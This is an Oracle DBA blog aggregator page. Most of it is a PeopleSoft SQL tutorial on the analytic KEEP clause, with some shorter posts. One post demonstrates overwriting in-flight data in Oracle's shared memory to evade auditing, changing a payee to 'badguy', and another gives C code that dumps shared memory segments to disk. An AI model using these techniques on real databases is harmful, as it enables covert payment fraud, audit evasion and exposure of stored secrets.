[oracle@localhost shared_memory]$ ./sga_data_replace vendor badguy



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter vendor matches replace parameter badguy
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- vendor
REPLACE WITH :- badguy
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_91 replace string at 366592
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_82 replace string at 3238216
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_75 replace string at 2230653
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361711
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361718
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_62 replace string at 1081334
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
Error: File is empty, nothing to do

Categories: DBA Blogs

Direct update of Oracle data in SGA to avoid audit.

ContractOracle - Thu, 2014-07-10 05:42
Vendors sell some rather expensive software for auditing Oracle database, and coding applications to ensure an audit trail, but the truth is that anyone logged into the database server as the owner of the database can directly modify data in datafiles, or even in memory.

I previously demonstrated using BBED to update blocks in datafiles, but it was necessary to update block checksums and flush the buffer cache to activate the changes.  Modifying data in SGA directly is easier, and leaves less evidence.  

It seems that once data is read into the SGA, Oracle does not use checksums to look for corruption, and it is also possible to modify uncommitted data.  I have written a simple C program to update SGA directly.

Here is one example demonstrating how even uncommitted data can be updated in the SGA.  The same thing can be done to any data in the SGA, including password hashes, credit card numbers, email addresses etc.

PDB1@ORCL> create table payment_batch (payee char(6));

Table created.

PDB1@ORCL> insert into payment_batch values ('vendor');

1 row created.

PDB1@ORCL> select * from payment_batch;

PAYEE
------
badguy

PDB1@ORCL> commit;

Commit complete.

PDB1@ORCL> alter system flush buffer_cache;

System altered.

PDB1@ORCL> select * from payment_batch;

PAYEE
------
badguy

You can see that in the middle of this transaction it was possible to modify the in-flight data stored in SGA, which was then committed to disk.  This was done via a direct update to SGA records on the DB server.
Categories: DBA Blogs

Introducing the Analytic Keep Clause for Effective-Dated/Sequence Queries in PeopleSoft

David Kurtz - Wed, 2014-07-09 13:46
Those of us who work with PeopleSoft, and especially the HCM product, are all too familiar with the concept of effect-dated data, and the need to find data that was effective at a particular date.  PeopleSoft products have always made extensive use of correlated sub-queries to determine the required rows from an effective-dated record.

The JOB record is a the heart of HCM. It is both effective-dated and effective sequenced. I will use it for the demonstrations in this article. I am going to suggest an alternative, although Oracle-specific, SQL construction.

 Let's start by looking at the job data for an employee in the demo database. Employee KF0018 has 17 rows of data two concurrent jobs.  The question I am going to ask is "What was the annual salary for this employee on 11 February 1995?".  Therefore, I am interested in the rows marked below with the asterisks. 
column annual_rt format 999,999
SELECT emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
FROM ps_job j
WHERE j.emplid = 'KF0018'
ORDER BY 1,2,3,4
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018 0 12-JUN-83 0 HIR 13000 FRF 120,000
KF0018 0 01-JAN-84 0 PAY 13000 FRF 123,600
KF0018 0 01-JAN-85 0 PAY 13000 FRF 127,308
KF0018 0 01-JAN-86 0 PAY 13000 FRF 131,764
KF0018 0 01-JAN-87 0 PAY 13000 FRF 136,376
KF0018 0 01-JAN-88 0 PAY 13000 FRF 140,467
KF0018 0 01-JAN-89 0 PAY 13000 FRF 147,490
KF0018 0 22-JAN-95 0 PRO 13000 FRF 147,490
KF0018 0 22-JAN-95 1 PAY 13000 FRF 294,239 *
KF0018 0 22-JAN-96 0 PAY 13000 FRF 318,575
KF0018 0 01-JAN-98 0 PAY 13000 FRF 346,156
KF0018 0 01-JAN-00 0 DTA 13000 FRF 346,156
KF0018 0 01-JAN-02 0 PAY 13000 EUR 52,771
KF0018 1 01-NOV-89 0 ASG 21300 GBP 22,440
KF0018 1 31-DEC-93 0 ASC 21300 GBP 22,440
KF0018 1 01-JAN-94 0 ASG 12000 GBP 22,440 *
KF0018 1 31-DEC-95 0 ASC 10000 GBP 22,440

I will set statistics level to ALL so I can obtain detailed information about how the SQL statements execute:
ALTER SESSION SET statistics_level = ALL;

I extracted the execution plans and execution statistics with the following command
select * from table(dbms_xplan.display_cursor(null,null,'IOSTATS')) 
Typical PeopleSoft Platform Agnostic ConstructionThis is the usual way to construct the query in PeopleSoft. It is also valid on all databases platforms supported by PeopleSoft, not just Oracle. 
SELECT  emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
FROM ps_job j
WHERE j.effdt = (
SELECT MAX (j1.effdt) FROM ps_job j1
WHERE j1.emplid = j.emplid
AND j1.empl_rcd = j.empl_rcd
AND j1.effdt <= TO_DATE('19950211','YYYYMMDD'))
AND j.effseq = (
SELECT MAX (j2.effseq) FROM ps_job j2
WHERE j2.emplid = j.emplid
AND j2.empl_rcd = j.empl_rcd
AND j2.effdt = j.effdt)
AND j.emplid = 'KF0018'
ORDER BY 1,2,3,4
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018 0 22-JAN-95 1 PAY 13000 FRF 294,239
KF0018 1 01-JAN-94 0 ASG 12000 GBP 22,440

This required three access of indexes on the PS_JOB table, and two accesses of the table, using 26 consistent reads.
Plan hash value: 2299825310
----------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers | Reads |
----------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 2 |00:00:00.01 | 26 | 2 |
| 1 | SORT ORDER BY | | 1 | 1 | 2 |00:00:00.01 | 26 | 2 |
| 2 | NESTED LOOPS | | 1 | 1 | 2 |00:00:00.01 | 26 | 2 |
| 3 | NESTED LOOPS | | 1 | 1 | 3 |00:00:00.01 | 21 | 2 |
| 4 | VIEW | VW_SQ_1 | 1 | 1 | 2 |00:00:00.01 | 14 | 2 |
|* 5 | FILTER | | 1 | | 2 |00:00:00.01 | 14 | 2 |
| 6 | HASH GROUP BY | | 1 | 1 | 2 |00:00:00.01 | 14 | 2 |
| 7 | TABLE ACCESS BY INDEX ROWID| PS_JOB | 1 | 1 | 12 |00:00:00.01 | 14 | 2 |
|* 8 | INDEX RANGE SCAN | PS_JOB | 1 | 1 | 12 |00:00:00.01 | 2 | 2 |
| 9 | TABLE ACCESS BY INDEX ROWID | PS_JOB | 2 | 1 | 3 |00:00:00.01 | 7 | 0 |
|* 10 | INDEX RANGE SCAN | PSAJOB | 2 | 1 | 3 |00:00:00.01 | 4 | 0 |
|* 11 | VIEW PUSHED PREDICATE | VW_SQ_2 | 3 | 1 | 2 |00:00:00.01 | 5 | 0 |
|* 12 | FILTER | | 3 | | 3 |00:00:00.01 | 5 | 0 |
| 13 | SORT AGGREGATE | | 3 | 1 | 3 |00:00:00.01 | 5 | 0 |
|* 14 | FILTER | | 3 | | 5 |00:00:00.01 | 5 | 0 |
|* 15 | INDEX RANGE SCAN | PSAJOB | 3 | 1 | 5 |00:00:00.01 | 5 | 0 |
----------------------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

5 - filter("J1"."EMPLID"='KF0018')
8 - access("J1"."EMPLID"='KF0018' AND "J1"."SYS_NC00164$">=HEXTORAW('883CFDF4FEF8FEFAFF') )
filter(SYS_OP_UNDESCEND("J1"."SYS_NC00164$")<=TO_DATE(' 1995-02-11 00:00:00', 'syyyy-mm-dd
hh24:mi:ss'))
10 - access("J"."EMPLID"='KF0018' AND "ITEM_2"="J"."EMPL_RCD" AND
"J"."SYS_NC00164$"=SYS_OP_DESCEND("MAX(J1.EFFDT)"))
filter(SYS_OP_UNDESCEND("J"."SYS_NC00164$")="MAX(J1.EFFDT)")
11 - filter(SYS_OP_UNDESCEND("J"."SYS_NC00165$")="MAX(J2.EFFSEQ)")
12 - filter(COUNT(*)>0)
14 - filter('KF0018'="J"."EMPLID")
15 - access("J2"."EMPLID"='KF0018' AND "J2"."EMPL_RCD"="J"."EMPL_RCD" AND
"J2"."SYS_NC00164$"=SYS_OP_DESCEND(SYS_OP_UNDESCEND("J"."SYS_NC00164$")))
filter(SYS_OP_UNDESCEND("J2"."SYS_NC00164$")=SYS_OP_UNDESCEND("J"."SYS_NC00164$"))

This construction is also the reason you are required to set
_UNNEST_SUBQUERY=FALSE
on all PeopleSoft systems
Analytic Function and In-LineView/Sub-query FactorI have seen people use a combination of analytic functions and in-line views to avoid having to use the correlated sub-query construction. This has been possible since Oracle 9i.
WITH X AS (
SELECT emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
, ROW_NUMBER() OVER (PARTITION BY emplid, empl_rcd 
ORDER BY effdt DESC, effseq DESC) myrowseq
FROM ps_job j
WHERE j.effdt <= TO_DATE('19950211','YYYYMMDD')
AND j.emplid = 'KF0018'
)
SELECT emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
FROM x
WHERE myrowseq = 1
ORDER BY 1,2,3,4
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018 0 22-JAN-95 1 PAY 13000 FRF 294,239
KF0018 1 01-JAN-94 0 ASG 12000 GBP 22,440

We get the same result, but now the index is scanned just once and we only need 14 consistent reads, so it produces a significant improvement. However, it still includes a sort operation in addition to the window function. We have to create a sequence number field in the in-line view and filter by that in the final query.
Plan hash value: 1316906785
---------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers |
---------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 2 |00:00:00.01 | 14 |
| 1 | SORT ORDER BY | | 1 | 1 | 2 |00:00:00.01 | 14 |
|* 2 | VIEW | | 1 | 1 | 2 |00:00:00.01 | 14 |
|* 3 | WINDOW NOSORT | | 1 | 1 | 12 |00:00:00.01 | 14 |
| 4 | TABLE ACCESS BY INDEX ROWID| PS_JOB | 1 | 1 | 12 |00:00:00.01 | 14 |
|* 5 | INDEX RANGE SCAN | PSAJOB | 1 | 1 | 12 |00:00:00.01 | 2 |
---------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

2 - filter("MYROWSEQ"=1)
3 - filter(ROW_NUMBER() OVER ( PARTITION BY "EMPLID","EMPL_RCD" ORDER BY
"J"."SYS_NC00164$","J"."SYS_NC00165$")<=1)
5 - access("J"."EMPLID"='KF0018' AND "J"."SYS_NC00164$">=HEXTORAW('883CFDF4FEF8FEFAFF')
)
filter(SYS_OP_UNDESCEND("J"."SYS_NC00164$")<=TO_DATE(' 1995-02-11 00:00:00',
'syyyy-mm-dd hh24:mi:ss'))

Analytic Function Keep Clause This form of the analytic functions is documented for the first time in 12c, but is available in 10g (my thanks to Tony Hasler for introducing me to it). It works by effectively keeping a running maximum value of the columns in the order by clause within in group.
SELECT emplid, empl_rcd
, MAX(effdt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS effdt
, MAX(effseq) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS effseq
, MAX(action) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS action
, MAX(deptid) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS deptid
, MAX(currency_cd) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS currency_cd
, MAX(annual_rt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS annual_rt
FROM ps_job j
WHERE j.effdt <= TO_DATE('19950211','YYYYMMDD')
AND j.emplid = 'KF0018'
GROUP BY emplid, empl_rcd
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018 0 22-JAN-95 1 PAY 13000 FRF 294,239
KF0018 1 01-JAN-94 0 ASG 12000 GBP 22,440

Although this construction uses an additional consistent read, it has the advantage of not using either an inline view or a window function and does not sort the data.
Plan hash value: 1550496807
-------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers |
-------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 2 |00:00:00.01 | 15 |
| 1 | SORT GROUP BY NOSORT | | 1 | 1 | 2 |00:00:00.01 | 15 |
| 2 | TABLE ACCESS BY INDEX ROWID| PS_JOB | 1 | 1 | 12 |00:00:00.01 | 15 |
|* 3 | INDEX RANGE SCAN | PS_JOB | 1 | 1 | 12 |00:00:00.01 | 3 |
-------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

3 - access("J"."EMPLID"='KF0018' AND "J"."SYS_NC00164$">=HEXTORAW('883CFDF3FEF8FEFAFF'
) )
filter(SYS_OP_UNDESCEND("J"."SYS_NC00164$")<=TO_DATE(' 1995-02-12 00:00:00',
'syyyy-mm-dd hh24:mi:ss'))

I think this construction could be useful in PeopleSoft.  At first glance the SQL appears more complicated, but it in this example it removed two correlated sub-queries. 
Using Analytic Functions in PS/QueryOf course you can code it anywhere where you can simply enter SQL as text.  However, it also has the advantage over the other analytic function construction that it can be coded in the PS/Query tool.  The analytic functions in the select caluse should be created in PS/Query expressions with the aggregate expression checkbox ticked.
Analytic 'Keep' function in PS/Query Aggregate ExpressionAnalytic Function in Aggregated Expression in Windows Client version of PS/Query  The analytic functions can be selected in the PS/Query, and their lengths and titles can be tidied up.
Analytic PS/QueryPS/Query with Analytic 'Keep' Functions
This is the resulting SQL which is the same as before (with row level security added by PS/Query) and produces the same results.
SELECT A.EMPLID, A.EMPL_RCD, MAX(effdt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq)
, MAX(effseq) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq), MAX(action) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq), MAX(deptid) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq), MAX(currency_cd) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq), MAX(annual_rt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq)
FROM PS_JOB A, PS_EMPLMT_SRCH_QRY A1
WHERE ( A.EMPLID = A1.EMPLID
AND A.EMPL_RCD = A1.EMPL_RCD
AND A1.OPRID = 'PS'
AND ( A.EFFDT <= TO_DATE('1995-02-11','YYYY-MM-DD')
AND A.EMPLID = 'KF0018' ) )
GROUP BY A.EMPLID, A.EMPL_RCD

GoldenGate Active-Active Database Replication with Conflict Detection and Resolution

VitalSoftTech - Tue, 2014-07-08 14:46
Bi-Directional Replication also known as Active-Active Replication, is a configuration where both databases are used as an active site and applications perform DML/DDL activities on both Databases. The OGG processes is configured to replicate the transaction data of both the source databases back and forth to each other. 1. Advantages Bi-directional GoldenGate Replication can be […]
Categories: DBA Blogs

C program to dump shared memory segments to disk on Linux.

ContractOracle - Tue, 2014-07-08 02:26
The following program was written to help investigate Oracle database shared memory on Linux.  It dumps the contents of existing shared memory segments to files on disk.  Note that it won't work against Oracle 11g and 12C databases as they use mmap instead of shmat for managing shared memory.  Sample program for reading from 11g and 12C here (mmap example )

Compile it using "gcc -o shared shared.c"  It is free for anyone to copy or modify as they wish, but I do not guarantee the functionality.

Check the format of the include listings below as I had to remove hashes and greater-than/less-than symbols to keep blogger happy.

include stdio.h
include stdlib.h
include sys/shm.h


int main (int argc, char *argv[]) {
    int maxkey, id, shmid = 0;
    struct shm_info shm_info;
    struct shmid_ds shmds;
    void * shared_data;
    FILE * outfile;
    
    maxkey = shmctl(0, SHM_INFO, (void *) &shm_info);
    for(id = 0; id <= maxkey; id++) {
        shmid = shmctl(id, SHM_STAT, &shmds);
        char shmidchar[16];
        snprintf(shmidchar, sizeof(shmidchar), "%d", shmid);
        if (shmid < 0)
            continue;
        if(shmds.shm_segsz > 0) {
            printf("Shared memory segment %s found.\n",shmidchar);
            
            shared_data = shmat(shmid, NULL, 0666);
            if(shared_data != NULL) {
                outfile = fopen(shmidchar, "wb");
                if(outfile == NULL) {
                    printf("Could not open file %s for writing.", shmidchar);
                }
                else {
                    fwrite(shared_data, shmds.shm_segsz, 1, outfile);
                    fclose(outfile);
                    
                    printf("Dumped to file %s\n\n", shmidchar);
                }
            }
        }
    }
}



Categories: DBA Blogs

George EP Box

Greg Pavlik - Mon, 2014-07-07 16:22
"Essentially, all models are wrong. Some models are useful."

Pages

Subscribe to Oracle FAQ aggregator